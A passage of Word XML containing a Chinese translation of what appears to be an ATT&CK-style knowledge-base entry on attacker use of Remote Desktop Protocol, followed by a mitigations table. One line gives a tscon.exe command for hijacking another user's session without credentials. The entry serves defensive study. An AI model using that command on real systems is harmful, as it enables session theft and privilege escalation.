          <w:p w14:paraId="669197B8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7659AA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18334E30" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034B4A6D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程桌面是操作系统中的常见功能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其对远程桌面协议（</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的实现称为远程桌面服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。还有其他实现和第三方工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的图形访问远程服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72F9E8" w14:textId="21B822A7" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果启用了服务并允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>已知</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到远程系统以扩展访问权限。攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术来获取</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RD</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术来实现持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA2FF9" w14:textId="5ADE97CD" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窃取合法用户的远程会话。通常，当其他人试图窃取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话并收到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
      <w:r>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示时，会通知用户。拥有系统权限并使用终端服务控制台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>c:\windows\system32\tscon.exe [session number to be stolen]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以劫持会话，而无需</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>提示用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们</w:t>
      </w:r>
      <w:r>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在远程或本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
      <w:r>
        <w:t>活动的或已断连的会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。窃取域管理员或更高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限账号的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致远程系统发现和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有这些都可以通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原生</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来完成，但是它也已作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一项</w:t>
      </w:r>
      <w:r>
        <w:t>功能添加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RedSnarf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2A29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F2338" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2968"/>
        <w:gridCol w:w="6768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00991CCE" w14:paraId="2F33C786" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="37370B4A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00991CCE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00991CCE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="55B8D798" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00991CCE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00991CCE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="5A148F11" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707A2955" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId213" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>审核</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="199090ED" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期审核</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程桌面用户群组</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成员身份。从</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程桌面用户群组</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中删除不必要的账号和群组。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="0E770DC0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C15724" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId214" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特性或程序禁用或移除</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5138E35B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果不需要，请禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="4D75C50C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0857439D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId215" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络资源访问限制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C98EBE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用远程桌面网关。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="1910AEFF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A1535C7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId216" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因子认证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABCD3A8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对远程登录使用多因子身份认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="4F9C8BFF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301633BF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId217" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ECBE852" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>从</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>nternet</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。启用防火墙规则来阻止网络内安全区域之间的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E57B02" w14:paraId="6ACB7556" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43B3994B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId218" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C0C9C0D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更改</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置来定义更短的超时会话以及任何单个会话可以处于活动状态</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>的最长时间。更改</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>指定已断连会话在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
